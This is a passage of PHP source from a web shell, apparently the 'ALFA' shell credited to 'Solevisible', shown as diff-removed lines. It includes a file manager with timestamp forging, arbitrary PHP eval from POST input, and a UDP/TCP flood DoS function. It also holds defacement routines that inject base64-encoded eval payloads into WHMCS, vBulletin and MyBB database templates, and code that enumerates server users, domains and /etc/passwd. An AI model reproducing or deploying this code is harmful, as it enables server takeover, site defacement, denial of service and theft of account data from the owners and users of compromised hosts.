- if($fp){ $_POST['alfa2'] = "edit";
- fclose($fp);
- } }else{ $_POST['alfa2'] = "edit";
- } } if(!file_exists(@$_POST['alfa1'])){ echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>FILE DOEST NOT EXITS...!</font></div></p></center></div>";
- alfaFooter();
- return;
- } $uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
- if(!$uid) { $uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
- $gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
- } else $gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
- echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['alfa1'])).' <span>Size:</span> '.(is_file($_POST['alfa1'])?alfaSize(filesize($_POST['alfa1'])):'-').' <span>Permission:</span> '.alfaPermsColor($_POST['alfa1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
- echo '<br>';
- if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
- if(is_file($_POST['alfa1'])){ $m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
- }else{ $m = array('Chmod', 'Rename', 'Touch');
- } foreach($m as $v) echo $v == 'Delete' ? '<a href="javascript:void(0);
- " onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');
- chk?g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.strtolower($v).'\'):\'\';
- "><span>'.((strtolower($v)==@$_POST['alfa2'])?'<b><span> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);
- " onclick="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.strtolower($v).'\')"><span>'.((strtolower($v)==@$_POST['alfa2'])?'<b><span> '.$v.' </span> </b>':$v).' | </span></a> ';
- echo '<br><br>';
- switch($_POST['alfa2']){ case 'view': echo '<pre class="ml1">';
- echo htmlspecialchars(__read_file($_POST['alfa1']));
- echo '</pre>';
- break;
- case 'highlight': if(@is_readable($_POST['alfa1'])){ echo '<div class="ml1" style="background-color: #e1e1e1;
- color:black;
- ">';
- $code = @highlight_file($_POST['alfa1'],true);
- echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
- } break;
- case 'delete': if(@is_writable($_POST['alfa1'])){ if(@unlink($_POST['alfa1']))echo 'File Deleted...';
- else echo 'Error...';
- } break;
- case 'chmod': if(!empty($_POST['alfa3'])){ $perms = 0;
- for($i=strlen($_POST['alfa3'])-1;
- $i>=0;
- --$i) $perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
- if(!@chmod($_POST['alfa1'], $perms)){ echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";
- </script>';
- }else{echo('Success!');
- } } clearstatcache();
- AlfaNum(8,9,10,7,6,5,4,2,1);
- echo '<script>alfa3_="";
- </script><form onsubmit="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.$_POST['alfa2'].'\',this.chmod.value);
- return false;
- "><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['alfa1'])),-4).'"><input type=submit value=">>"></form>';
- break;
- case 'edit': if( !is_writable($_POST['alfa1'])) { echo 'File isn\'t writeable';
- break;
- } if(!empty($_POST['alfa3'])){ $time = @filemtime($_POST['alfa1']);
- $_POST['alfa3'] = substr($_POST['alfa3'],1);
- $fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
- if($fp){ echo 'Saved!<br><script>alfa3_="";
- </script>';
- @touch($_POST['alfa1'],$time,$time);
- } } echo '<form onsubmit="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value);
- return false;
- "><p><input type="submit" value=" "></p><textarea name=text class=bigarea>';
- echo htmlspecialchars(__read_file($_POST['alfa1']));
- echo '</textarea><p><input type="submit" value=" "></p></form>';
- break;
- case 'hexdump': $c = @file_get_contents($_POST['alfa1']);
- $n = 0;
- $h = array('00000000<br>','','');
- $len = strlen($c);
- for ($i=0;
- $i<$len;
- ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' ';
- switch ( ord($c[$i]) ) { case 0: $h[2] .= ' ';
- break;
- case 9: $h[2] .= ' ';
- break;
- case 10: $h[2] .= ' ';
- break;
- case 13: $h[2] .= ' ';
- break;
- default: $h[2] .= $c[$i];
- break;
- } $n++;
- if ($n == 32) { $n = 0;
- if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';
- } $h[1] .= '<br>';
- $h[2] .= "\n";
- } } echo '<table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;
- "><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
- break;
- case 'rename': if( !empty($_POST['alfa3']) ) { if(!@rename($_POST['alfa1'], $_POST['alfa3'])){ echo 'Can\'t rename!<br>';
- }else{echo('Renamed!');
- } } echo '<form onsubmit="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.$_POST['alfa2'].'\',this.name.value);
- return false;
- "><input type="text" name="name" value="'.htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$_POST['alfa1']).'"><input type=submit value=">>"></form>';
- break;
- case 'touch': if( !empty($_POST['alfa3']) ) { $time = strtotime($_POST['alfa3']);
- if($time) { if(!touch($_POST['alfa1'],$time,$time)) echo 'Fail!';
- else echo 'Touched!';
- } else echo 'Bad time format!';
- } clearstatcache();
- echo '<script>alfa3_="";
- </script><form onsubmit="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.$_POST['alfa2'].'\',this.touch.value);
- return false;
- "><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['alfa1'])).'"><input type=submit value=">>"></form>';
- break;
- case 'image': echo('<hr>');
- $file = $_POST['alfa1'];
- $image_info = @getimagesize($file);
- if(is_array($image_info)){ $width = (int)$image_info[0];
- $height = (int)$image_info[1];
- $image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
- if($width > 800){$width = 800;
- } echo $content = "<center>".$image_info_h."<br><img id='viewImage' style='width:".$width."px;
- border:1px solid green;
- ' src='data:".$image_info['mime'].";
- base64,".__ZW5jb2Rlcg(__read_file($file))."' alt='".$file."'></center><br>";
- } break;
- } echo '</div>';
- alfaFooter();
- } function findicon($file,$type){ $s = 'http://solevisible.com/icons/';
- $types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
- if($type!='file'){ return ($file=='..'?$s.'back.png':$s.'folder.png');
- }else{ $ext = explode('.',$file);
- $ext = end($ext);
- $ext = strtolower($ext);
- return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
- } } function alfadlfile(){ if(isset($_POST['c'],$_POST['file'])){ $_POST['file'] = urldecode(utf8_decode($_POST['file']));
- $_POST['file'] = $_POST['c'].'/'.$_POST['file'];
- if(@is_file($_POST['file']) && @is_readable($_POST['file'])){ ob_start("ob_gzhandler", 4096);
- header("Content-Disposition: attachment;
- filename=".basename($_POST['file']));
- if(function_exists("mime_content_type")){ $type = @mime_content_type($_POST['file']);
- header("Content-Type: " . $type);
- }else{header("Content-Type: application/octet-stream");
- } echo __read_file($_POST['file']);
- }else echo('Error...!');
- }} function alfaphpeval(){ alfahead();
- if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){ echo '<div class=header>';
- ob_start();
- $INI=ini_get_all();
- print '<table border=0><tr>' .'<td class="listing"><font class="highlight_txt">Param</td>' .'<td class="listing"><font class="highlight_txt">Global value</td>' .'<td class="listing"><font class="highlight_txt">Local Value</td>' .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
- foreach ($INI as $param => $values) print "\n".'<tr>' .'<td class="listing"><b>'.$param.'</td>' .'<td class="listing">'.$values['global_value'].' </td>' .'<td class="listing">'.$values['local_value'].' </td>' .'<td class="listing">'.$values['access'].' </td></tr>';
- $tmp = ob_get_clean();
- $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
- $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
- echo str_replace('<h1','<h2', $tmp) .'</div><br>';
- } if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) { echo '<div class=header><style>.p {color:#000;
- }</style>';
- ob_start();
- phpinfo();
- $tmp = ob_get_clean();
- $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
- $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
- echo str_replace('<h1','<h2', $tmp) .'</div><br>';
- } if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) { echo '<div class=header>';
- ob_start();
- $EXT=get_loaded_extensions();
- print '<table border=0><tr><td class="listing">' .implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT) .'</td></tr></table>' .count($EXT).' extensions loaded';
- echo '</div><br>';
- } if(empty($_POST['ajax']) && !empty($_POST['alfa1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
- echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,\'\');
- return false;
- "><textarea placeholder="file_get_contents(\'/etc/passwd\');
- " name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
- echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;
- ':'').'margin-top:5px;
- " class=ml1>';
- if(!empty($_POST['alfa1'])) { ob_start();
- eval($_POST['alfa1']);
- echo '<textarea class=bigarea id=PhpCode>'.htmlspecialchars(ob_get_clean()).'</textarea>';
- } echo '</pre></div>';
- alfafooter();
- } function alfahash(){ if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));
- }} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';
- for($i=0;
- $i<strlen($p);
- ++$i)$r.= '%'.dechex(ord($p[$i]));
- return strtoupper($r);
- }} $stringTools = array( 'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)', 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)', 'strrev ( $string )' => 'strrev($s)', 'bin2hex ( $string )' => 'bin2hex($s)', 'hex2bin ( $string )' => 'hex2bin($s)', 'md5 ( $string )' => 'md5($s)', 'sha1 ( $string )' => 'sha1($s)', 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)', 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)', 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)', 'crypt ( $string )' => 'crypt($s)', 'crc32 ( $string )' => 'crc32($s)', 'str_rot13 ( $string )' => 'str_rot13($s)', 'urlencode ( $string )' => 'urlencode($s)', 'urldecode ( $string )' => 'urldecode($s)', 'full_urlencode ( $string )' => 'full_urlencode($s)', 'htmlspecialchars ( $string )' => 'htmlspecialchars($s)', 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))', 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))', 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))', 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))', 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))', 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))', );
- alfahead();
- echo '<div class=header>';
- echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);
- return false;
- '><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;
- '>";
- foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
- echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
- if(!empty($_POST['alfa1'])){ $string = addslashes($_POST['alfa2']);
- $string = str_replace('\"','"',$string);
- $alg = $_POST['alfa1'];
- $code = str_replace('$s',"'".$string."'",$alg);
- ob_start();
- eval('echo '.$code.';
- ');
- $res = ob_get_contents();
- ob_end_clean();
- if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
- } echo "</div>";
- alfaFooter();
- } function alfados(){ alfahead();
- echo '<div class=header>';
- echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value);
- return false;
- "><div class="txtfont">Method : <select name="m" style="width:80px;
- "><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
- if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){ echo __pre();
- $packets=0;
- ignore_user_abort(true);
- $exec_time=(int)$_POST['alfa2'];
- $time=time();
- $max_time=$exec_time+$time;
- $host=$_POST['alfa1'];
- $port=(int)$_POST['alfa3'];
- $method=$_POST['alfa4'];
- $out = str_repeat('X',65000);
- while(1){ $packets++;
- if(time() > $max_time){ break;
- } $fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
- if($fp){ fwrite($fp, $out);
- fclose($fp);
- } } echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
- echo "</pre>";
- } echo '</div>';
- alfafooter();
- } function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');
- } function alfaIndexChanger(){ alfahead();
- ALfaNum(5,6,7,8,9,10);
- echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
- if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){ echo __pre();
- ALfaNum(1,2,3,4,5);
- echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
- <p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value);
- return false;
- \">
- ";
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50') );
- create_table($table);
- echo "<br><div class='txtfont'>| Your Index |</div><br>
- <textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
- <input type='submit' value=' '>
- </form></center></center>";
- if(isset($_POST['alfa6'])){ $s0levisible="Powered By Solevisible";
- $dbu = $_POST['alfa6'];
- $path = $_POST['alfa5'];
- $fname = $_POST['alfa4'];
- $dbn = $_POST['alfa7'];
- $dbp = $_POST['alfa8'];
- $dbh = $_POST['alfa9'];
- $index = $_POST['alfa10'];
- $index = str_replace("\'","'",$index);
- $deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'");
- $solevisible = fopen("'.$fname.'","w");
- fwrite($solevisible,$x);
- ';
- $saveData = __ZW5jb2Rlcg($deface);
- $Def = '{php}eval(base64_decode("'.$saveData.'"));
- {/php}';
- if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){ $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
- $soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
- $soleGet = mysqli_fetch_assoc($soleSave);
- $tempSave1 = $soleGet['message'];
- $tempSave = str_replace("'","\'",$tempSave1);
- $inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
- $result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
- $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
- $result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
- if(function_exists('curl_version')){ $AlfaSole = new AlfaCURL(true);
- $saveurl = $AlfaSole->Send($path."/pwreset.php");
- $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
- $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
- $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
- $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
- __alert('File Created...');
- echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
- }else{ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
- }}}} if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){ echo __pre();
- ALfaNum(1,2,3,4,5);
- echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
- <p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>');
- return false;
- \">
- ";
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50') );
- create_table($table);
- echo "<br><div class='txtfont'>| Your Index |</div><br>
- <textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
- <input type='submit' value=' '></form></center></center>";
- if($_POST['alfa8']=='>>'){ $s0levisible="Powered By Solevisible";
- $dbu = $_POST['alfa2'];
- $dbn = $_POST['alfa3'];
- $dbp = $_POST['alfa4'];
- $dbh = $_POST['alfa5'];
- $index = $_POST['alfa6'];
- $prefix = $_POST['alfa7'];
- $index=str_replace("\'","'",$index);
- $set_index = "{\${eval(base64_decode(\'";
- $set_index .= __ZW5jb2Rlcg("echo \"$index\";
- ");
- $set_index .= "\'))}}{\${exit()}}";
- if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){ $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
- $loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
- $loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
- $loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
- @mysqli_query($conn,$loli1) or die (mysqli_error($conn));
- @mysqli_query($conn,$loli2) or die (mysqli_error($conn));
- @mysqli_query($conn,$loli3) or die (mysqli_error($conn));
- __alert('VB index changed...!');
- } } } if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) { echo __pre();
- ALfaNum(1,2,3,4,5);
- echo "<center><center><div class='txtfont_header'>| Mybb |</div>
- <p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value);
- return false;
- \" method=POST action=''>
- ";
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50') );
- create_table($table);
- echo "<br><div class='txtfont'>| Your Index |</div><br>
- <textarea name=mybbindex rows='19' cols='103'>
- <title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
- if(isset($_POST['alfa6'])){ $mybb_dbh = $_POST['alfa6'];
- $mybb_dbu = $_POST['alfa7'];
- $mybb_dbn = $_POST['alfa8'];
- $mybb_dbp = $_POST['alfa9'];
- $mybb_index = $_POST['alfa10'];
- if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){ $conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
- $prefix="mybb_";
- $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
- $result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
- __alert('MyBB index changed...!');
- } } } echo "</div>";
- alfafooter();
- } function alfaproc() { alfahead();
- echo "<Div class=header><br><center>";
- if(empty($_POST['ajax'])&&!empty($_POST['alfa1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
- if($GLOBALS['sys']=="win"){ $process=array( "Task List" =>"tasklist /V", "System Info" =>"systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );
- }else{ $process=array( "Process status" => "ps aux", "Syslog" =>"cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" =>"cat /etc/hosts", "Cpuinfo"=>"cat /proc/cpuinfo", "Version"=>"cat /proc/version", "Sbin"=>"ls -al /usr/sbin", "Interrupts"=>"cat /proc/interrupts", "lsattr"=>"lsattr -va", "Uptime"=>"uptime", "Fstab" =>"cat /etc/fstab" );
- } foreach($process as $n => $link) { echo '<a href="javascript:void(0);
- " onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
- } echo "</center><br>";
- if(!empty($_POST['alfa1'])) { echo "<pre class='ml1' style='margin-top:5px' >";
- echo alfaEx($_POST['alfa1']);
- echo '</pre>';
- } echo "</div>";
- alfafooter();
- } function alfasafe() { alfahead();
- ALfaNum(9,10);
- echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
- echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
- if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains') {if(!@file_exists("/etc/virtual/domainowners")){ echo __pre();
- $solevisible9 = @file('/etc/named.conf');
- if(is_array($solevisible9)){ foreach($solevisible9 as $solevisible13){ if(@eregi('zone',$solevisible13)){ preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
- if(strlen(trim($solevisible14[1][0])) > 2){ echo $solevisible14[1][0].'<br>';
- }}} } }else{ echo __pre();
- $users = @file("/etc/virtual/domainowners");
- if(is_array($users)){ foreach($users as $boz){ $dom = explode(":",$boz);
- echo $dom[0]."\n";
- }}}} if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases') { ALfaNum(5,8,10,4,3,2,1);
- echo '
- <form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\');
- return false;
- " method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
- if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){ if(!@file_exists("/etc/virtual/domainowners")){ if(function_exists("posix_getpwuid") && function_exists("fileowner")){ $site = trim($_POST['alfa7']);
- $rep = str_replace(array("https://","http://","www."),"",$site);
- if(@$user = posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){ if($user['name']!= 'root'){ echo __pre()."<center><table border='1'>
- <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user['name']}</font></b></td></tr>
- <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr>
- </table>
- </center>";
- }}} else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';
- } }else{ $site = trim($_POST['alfa7']);
- $rep = str_replace(array("https://","http://","www."),"",$site);
- $users = @file("/etc/virtual/domainowners");
- foreach($users as $boz){ $ex = explode(":",$boz);
- if($ex[0] == $rep){ echo __pre()."<center><table border='1'>
- <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
- <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
- break;
- }}}}} if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])) { if(!@file_exists("/etc/virtual/domainowners")){ echo __pre();
- $i = 0;
- while ($i < 60000) { @$line = posix_getpwuid($i);
- if (!empty($line)) { while (list ($key, $vl) = each($line)){ echo $vl."\n";
- break;
- }}$i++;
- } }else{echo __pre();
- $users = @file("/etc/virtual/domainowners");
- foreach($users as $boz){ $user = explode(":",$boz);
- echo trim($user[1]).'<br>';
- }}} if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){ echo __pre();
- if(strlen(alfaEx("id"))>0){echo alfaEx("cat /etc/passwd");
- } elseif(function_exists("file_get_contents") && @is_readable("/etc/passwd")){ echo @file_get_contents("/etc/passwd");
- } elseif(function_exists("posix_getpwuid")){ for($uid=0;
- $uid<60000;
- $uid++){ $ara = @posix_getpwuid($uid);
